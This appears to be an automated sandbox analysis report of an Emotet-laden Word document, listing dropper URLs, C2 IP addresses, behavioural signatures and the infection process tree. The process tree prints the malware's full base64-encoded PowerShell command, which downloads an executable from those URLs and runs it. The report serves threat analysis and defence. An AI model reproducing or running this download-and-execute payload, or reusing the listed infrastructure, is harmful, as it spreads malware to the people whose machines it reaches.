Analysis

  • max time kernel
    24s
  • resource
    win10v191014
  • submitted
    25-12-2019 07:02

General

  • Target

    1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

  • Sample

    191225-a3g39c5c7j

  • SHA256

    1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://joaoleobarbieri.adv.br/test/l4d6638v6l-fotnu5m-867027278/

exe.dropper

http://kaplanforklift.com/web_map/PmTuIEQ/

exe.dropper

http://londontravel.com.ar/brc/HsGpuPR/

exe.dropper

https://leavenworthrental.com/calendar/aoo-ue7-653740/

exe.dropper

http://lareserva.com.py/aloja/AOISroJmq/

Extracted

Family

emotet

C2

85.100.122.211:80

78.189.165.52:8080

88.248.140.80:80

45.79.75.232:8080

124.150.175.133:80

164.68.115.146:8080

5.189.148.98:8080

96.234.38.186:8080

178.134.1.238:80

212.129.14.27:8080

78.186.102.195:80

66.229.161.86:443

190.17.94.108:443

91.117.31.181:80

119.57.36.54:8080

37.59.24.25:8080

200.41.121.69:443

217.181.139.237:443

86.70.224.211:80

216.75.37.196:8080

rsa_pubkey.plain

Signatures

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Suspicious behavior: AddClipboardFormatListener
    PID:4924
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABPAGYAaAByAGYAYgBwAHgAcQA9ACcASABnAGEAZgBnAGoAagB6ACcAOwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACAAPQAgACcAOQA3ADMAJwA7ACQARgBwAGkAbQByAHgAYQBxAGUAPQAnAFEAYwB2AHcAbgBnAGoAZAByAGsAdwBsACcAOwAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACsAJwAuAGUAeABlACcAOwAkAFUAcgBmAG0AdABtAGoAdgBqAD0AJwBKAHMAawBzAHcAegB3AHAAbQBxAHkAawAnADsAJABIAGUAbwBtAGUAdwBsAHoAdgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AVAA7ACQAVQBoAGkAdABkAG8AagBrAGMAPQAnAGgAdAB0AHAAOgAvAC8AagBvAGEAbwBsAGUAbwBiAGEAcgBiAGkAZQByAGkALgBhAGQAdgAuAGIAcgAvAHQAZQBzAHQALwBsADQAZAA2ADYAMwA4AHYANgBsAC0AZgBvAHQAbgB1ADUAbQAtADgANgA3ADAAMgA3ADIANwA4AC8AKgBoAHQAdABwADoALwAvAGsAYQBwAGwAYQBuAGYAbwByAGsAbABpAGYAdAAuAGMAbwBtAC8AdwBlAGIAXwBtAGEAcAAvAFAAbQBUAHUASQBFAFEALwAqAGgAdAB0AHAAOgAvAC8AbABvAG4AZABvAG4AdAByAGEAdgBlAGwALgBjAG8AbQAuAGEAcgAvAGIAcgBjAC8ASABzAEcAcAB1AFAAUgAvACoAaAB0AHQAcABzADoALwAvAGwAZQBhAHYAZQBuAHcAbwByAHQAaAByAGUAbgB0AGEAbAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8AYQBvAG8ALQB1AGUANwAtADYANQAzADcANAAwAC8AKgBoAHQAdABwADoALwAvAGwAYQByAGUAcwBlAHIAdgBhAC4AYwBvAG0ALgBwAHkALwBhAGwAbwBqAGEALwBBAE8ASQBTAHIAbwBKAG0AcQAvACcALgAiAFMAcABsAGAAaQB0ACIAKAAnACoAJwApADsAJABEAHEAdwB0AHUAaQBlAHYAaAB4AGYAdgBkAD0AJwBMAHUAcwB1AGUAZQBuAHkAawB1AGsAYQB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACAAaQBuACAAJABVAGgAaQB0AGQAbwBqAGsAYwApAHsAdAByAHkAewAkAEgAZQBvAG0AZQB3AGwAegB2AC4AIgBkAGAAbwBXAG4AbABvAGAAQQBgAEQARgBpAGwAZQAiACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACwAIAAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAKQA7ACQAVwBoAHcAcQBxAHYAbgBjAG8AcwBvAD0AJwBOAG0AYgB3AGwAcQBiAHYAZgBwACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATQB1AG0AbQBpAHcAZAB3AHIAYgBlAGYAbAApAC4AIgBMAGAARQBuAEcAVABIACIAIAAtAGcAZQAgADIANAAyADUAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAQQBgAFIAVAAiACgAJABNAHUAbQBtAGkAdwBkAHcAcgBiAGUAZgBsACkAOwAkAFIAbAB5AGoAaQBpAHYAcgBhAHgAegA9ACcAQwB5AHIAZABjAHEAcgBjAGwAeAB0AG8AJwA7AGIAcgBlAGEAawA7ACQAWQB0AHEAcwBxAHoAYQBlAGIAPQAnAEoAZgBzAHQAbQBvAGMAaQByACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAYgBtAHAAYQBuAGYAbgA9ACcAVABkAHcAeQBrAGYAaQBvAHQAeAB3AG4AJwA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    PID:3748
    • C:\Users\Admin\973.exe
      "C:\Users\Admin\973.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4672
      • C:\Users\Admin\973.exe
        --6e477d3
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4740

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\973.exe

  • C:\Users\Admin\973.exe

  • C:\Users\Admin\973.exe

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

  • memory/4672-10-0x00000000006D0000-0x00000000006E7000-memory.dmp

    Filesize

    92KB

  • memory/4740-13-0x00000000007E0000-0x00000000007F7000-memory.dmp

    Filesize

    92KB

  • memory/4740-14-0x0000000000400000-0x00000000004AA000-memory.dmp

    Filesize

    680KB